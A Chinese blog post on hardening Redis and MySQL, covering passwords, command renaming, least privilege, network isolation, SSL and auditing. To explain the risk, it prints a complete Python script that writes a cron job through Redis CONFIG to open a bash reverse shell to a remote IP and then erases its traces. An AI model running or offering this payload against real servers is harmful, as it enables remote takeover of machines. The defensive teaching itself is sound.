系统安全 - Redis&MySQL安全及实践

于 2024-10-04 07:45:00 发布
阅读量910 收藏 6
点赞数 17
文章标签: 安全 系统安全 redis mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yangshangwei/article/details/142694176
版权

文章目录


在这里插入图片描述

导图

在这里插入图片描述

Redis 安全

Redis的设计初衷是为了在可信环境下提供高性能的KV数据库服务,因此它的安全设计较为简陋,这也导致了其在公开网络中的安全性较差。

潜在的安全风险

  • 数据篡改:如果黑客成功连接到Redis服务器,他们可以通过命令如FLUSHALL清空所有数据。
  • 命令执行:Redis虽然不能直接执行命令,但通过配置文件操作如CONFIG,攻击者可以间接写入如crontab的恶意任务,从而执行系统命令来控制服务器。
import redis

r = redis.Redis(host='10.0.0.1', port=6379, db=0, socket_timeout=10)
payload = '\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/1.2.3.4/8080 0>&1\n\n'
path = '/var/spool/cron'
name = 'root'
key = 'payload'

# 设置 Redis 键值对
r.set(key, payload)

# 配置 Redis 操作目录并保存恶意 payload 到 cron 文件
r.config_set('dir', path)
r.config_set('dbfilename', name)
r.save()

# 删除 Redis 中的键值对,清除操作痕迹
r.delete(key)

# 将 Redis 的工作目录恢复到临时目录
r.config_set('dir', '/tmp')

利用 Redis 的 CONFIG 命令和一些其他命令来尝试进行恶意操作,在目标系统上植入一个反向 shell,并清除操作痕迹。这种攻击模式通常涉及篡改系统的 cron 任务计划文件 (/var/spool/cron) 来启动恶意 shell

防护措施

密码认证

redis.conf中设置requirepass来增加密码认证,虽然这可能会略微影响性能,但对于在不受信网络中的Redis部署,强密码认证是必不可少的,比较推荐随机生成一个 32 位的“数字加字母”的密码。

命令重命名

通过rename-command将敏感命令如CONFIGFLUSHALL重命名为随机字符串,避免黑客轻易调用这些命令。 比如 rename-command CONFIG pUVEYEvdaGH2eAHmNFcDh8Qf9vOej4Ho

权限最小化

Redis应以低权限用户(如nobody)运行,避免root权限运行,防止攻击者获取到过高的权限。(Redis 本身也需要保存日志和持久化数据,所以,它仍然需要写入日志文件的权限(小于 ROOT 权限)来保证正常运行)

日志和审计 Red

is的日志功能相对简单,没有详细的审计信息,因此在重要应用中,建议结合外部日志系统进行日志收集和分析。

网络隔离

建议通过防火墙或网络策略限制外部访问Redis实例,仅允许可信IP访问。

MySQL 安全

与Redis相比,MySQL作为一个成熟的关系型数据库,其安全机制要完善得多,提供了认证、授权、加密等一系列功能。

认证和授权

  • MySQL的多用户认证体系将用户的信息存储在mysql.user表中,并支持密码过期、密码重用限制、密码强度评估等功能,提供了较为全面的密码管理。
  • MySQL的授权机制通过GRANT命令赋予用户对特定数据库或表的权限,支持细粒度的权限控制。GRANT ALL PRIVILEGES ON db.table TO user@"127.0.0.1" IDENTIFIED BY "password"

文件操作风险

  • MySQL提供了对本地文件的读写功能,例如通过LOAD DATA INFILE读取文件,SELECT ... INTO DUMPFILE写入文件。这些功能虽然方便,但如果配置不当,可能会被黑客利用来读取敏感文件或写入恶意脚本。

传输和存储加密

  • 传输加密:MySQL支持通过SSL加密客户端和服务器之间的通信。通过配置ssl-cassl-certssl-key等参数可以启用SSL。
    在这里插入图片描述

  • 存储加密:MySQL支持基于keyring_file插件的硬盘加密,表密钥通过主密钥加密后存储在表的表头中。需要注意备份主密钥文件,以防止数据丢失。

最小权限原则

  • MySQL会自动创建一个权限较低的mysql用户用于运行MySQL进程,避免以root权限运行数据库实例。

审计

虽然MySQL本身不提供内置的审计功能,但可以通过第三方插件如McAfee的mysql-audit或MariaDB的审计插件进行操作日志的收集和分析。

总结

在这里插入图片描述

  • Redis:主要在于性能优先,因此其安全功能较少。通过设置密码、限制网络访问、使用非root用户运行等方式,能在一定程度上提升安全性。
  • MySQL:功能更加完善,具有强大的认证、授权、加密和最小权限配置,通过合理配置这些安全功能,可以显著提升MySQL的安全性。

在这里插入图片描述

小小工匠
关注
〖Python 数据库开发实战 - Redis篇⑤〗- Redis 的常用配置参数
易编橙 · 终身成长社群,相遇已是上上签!
09-13 4万+
该章节我们来了解一下 Redis 数据库的一些重要配置参数。因为现在运行的是单节点的 Redis 数据库,并没有组建 Redis 集群,所以有关集群的配置参数在该章节并不会介绍到。接下来我们就看一看,单节点的 Redis 数据库 都有那些重要的配置参数。
MySQLRedis比较及两者结合运用
2302_77150007的博客
05-16 1107
选择MySQL还是Redis取决于具体的应用需求。如果应用需要高速的数据访问和较低的资源消耗,Redis是一个很好的选择。而如果应用需要复杂的查询处理和高可靠性的数据持久性,MySQL则更为适合。那么长的比较帅/美的小伙伴就要问了。那我把两者结合不久好了。
系统安全 - Linux /Docker 安全模型及实践
最新发布
小工匠
10-02 1231
Linux 安全体系的核心是正确的权限配置和最小权限原则的实践。通过配置合适的权限、使用非 root 账户运行服务,以及对日志的有效监控,可以大大提升系统的安全性。下一步将介绍如何使用 HIDS 等安全工具,为 Linux 系统提供额外的保护层。
【MongoDB-Redis-MySQL-Elasticsearch-Kibana-RabbitMQ-MinIO】Java全栈开发软件一网打尽
记录我的学习历程
11-06 1303
本文旨在向您展示如何在Windows环境下进行全栈开发,从Java开发环境的安装和配置开始,一直到API测试和应用程序部署。我们将介绍关键技术和工具,包括Java Development Kit (JDK)、IDE、Maven、Git、Docker、MongoDB、RedisMySQL、Elasticsearch、RabbitMQ、MinIO、ApiPost和Postman等。通过这篇文章,您将学到如何构建一个强大的全栈应用程序,为您的开发之旅提供了有力的支持。
分布式锁实现方案--redis、zookeeper、mysql
ljran0612的专栏
08-13 1205
因为我这里是以三个节点为例。锁key的值附加唯一性:针对释放别人锁这种问题,我们可以给每个客户端进程设置【唯一ID】,作为锁(所有客户端锁key相同)的值,这样我们就可以在应用层就进行检查唯一ID。我们了解下什么是【可重入】:指的是同一个线程在持有锁的情况下,可以多次获取该锁而不会造成死锁,也就是一个线程可以在获取锁之后再次获取同一个锁,而不需要等待锁释放。InterProcessMultiLock:将多个锁作为单个实体管理的容器,获取锁的时候获取所有锁,释放锁也会释放所有锁资源(忽略释放失败的锁)。
Spring Boot实践四 --Redis缓存和Kafka
造梦先森Kai的专栏
07-30 1273
随着时间的积累,应用的使用用户不断增加,数据规模也越来越大,往往数据库查询操作会成为影响用户使用体验的瓶颈,此时使用缓存往往是解决这一问题非常好的手段之一。Spring 3开始提供了强大的基于注解的缓存支持,可以通过注解配置方式低侵入的给原有Spring应用增加缓存功能,提高数据访问性能。
Redis实践及数据安全
weixin_49076273的博客
08-15 685
1.使用redis网页缓存可以增加并发量,就是网页有缓存时,直接拿缓存,如果没有缓存,则去访问数据库,将数据库的数据缓存进redis,再返回,下次访问就是访问缓存。2.慢查询用以定位系统中存在的慢操作。对于高OPS场景,慢查询阈值slowlog-log-slower-than设置为1000,也就是1毫秒。而慢查询日志最大条数slowlog-max-len设置为1000以上。当慢查询日志条数达到上限时,再去记录新的慢查询日志会把最早的慢查询日志依次剔除。...
Redis(2)集群redis-cluster & redis主从同步
cowbin2012的专栏
04-28 1万+
设计原则和初衷 性能:这是Redis赖以生存的看家本领,增加集群功能后当然不能对性能产生太大影响,所以Redis采取了P2P而非Proxy方式、异步复制、客户端重定向等设计,而牺牲了部分的一致性、使用性。 水平扩展:集群的最重要能力当然是扩展,文档中称可以线性扩展到1000结点。 可用性:在Cluster推出之前,可用性要靠Sentinel保证。有了集群之后也自动具有了Sentinel的监控和自...
04-Redis 数据持久化实践
热门推荐
雨田说码
08-06 1万+
简介 背景 Redis是一种内存数据库,在断电时数据可能会丢失。比如你redis整个挂了,然后redis不可用了,如果没有持久化的话,redis就会丢失所有的数据,如果通过持久化将数据搞一份儿到磁盘上去,然后再定期同步到一些云存储服务上去,那么就可以保证一些数据不丢失,保证数据的可靠性。 持久化方式 Redis中为了保证在系统宕机(类似进程被杀死)情况下,能更快的进行故障恢复,设计了两种数据持久化方案,分别为rdb和aof。 Rdb方式是通过手动(save-阻塞式,bgsave-异步)或周期性方式保存re
基础知识:深入理解MongoDB、MySQLRedis的应用与实践
upgrador的博客
08-10 1149
在现代应用开发中,数据库系统的选择对于系统的性能、扩展性和维护性有着至关重要的影响。MongoDB、MySQLRedis 是三种流行的数据库技术,它们各自有着独特的特点和适用场景。本文将详细介绍这三者的区别,并通过架构图说明它们在系统中的应用环节。最后,我们将提供在 Spring Boot 中使用这三种数据库的 Java 类和配置文件的示例。
Java面试大厂-redis-mysql-spring-zookeeper
02-24
"Java面试大厂-redis-mysql-spring-zookeeper"这个主题涵盖了四大关键的技术领域:Java、MySQLRedis以及Spring和Zookeeper。这五个关键词代表了现代互联网应用开发中的核心技术栈,下面我们将对这些技术进行详细的...
springboot-shiros-mybatis-redis+mysql(前后分离)
09-16
【标题】"springboot-shiros-mybatis-redis+mysql(前后分离)"是一个基于Java的Web开发框架示例,它整合了Spring Boot、Shiro、MyBatis以及RedisMySQL数据库,实现了前后端分离的设计模式。 【Spring Boot】是...
linux环境安装资源包 tomcat-jdk-mysql-redis
10-16
本资源包"linux环境安装资源包 tomcat-jdk-mysql-redis"包含了四个关键组件,它们分别是Tomcat、JDK、MySQLRedis,这些都是构建高性能、高可用性的Web应用程序和服务所必需的工具。下面将详细解释这些组件以及它们...
在线点餐系统 ssm, redis, mysql.zip
04-15
**MySQL** 是一个广泛使用的开源关系型数据库管理系统,具有良好的性能、稳定性及易用性。在线点餐系统中,MySQL作为主数据库,存储系统的各类数据,如用户账户、餐厅信息、菜品详情、订单记录等。使用索引优化和...
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 773
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1206
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 751
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。
weixin_64446270的博客
09-27 1454
Spring Security 是一个强大的和高度可定制的身份验证和访问控制框架。它是 Spring 项目家族的一员,用于构建安全的 Java 应用程序。Spring Security 提供了全面的安全服务,从基本的登录认证到复杂的访问控制,几乎涵盖了所有与安全相关的需求。
安全服务面试
m0_74402888的博客
09-28 638
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小小工匠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值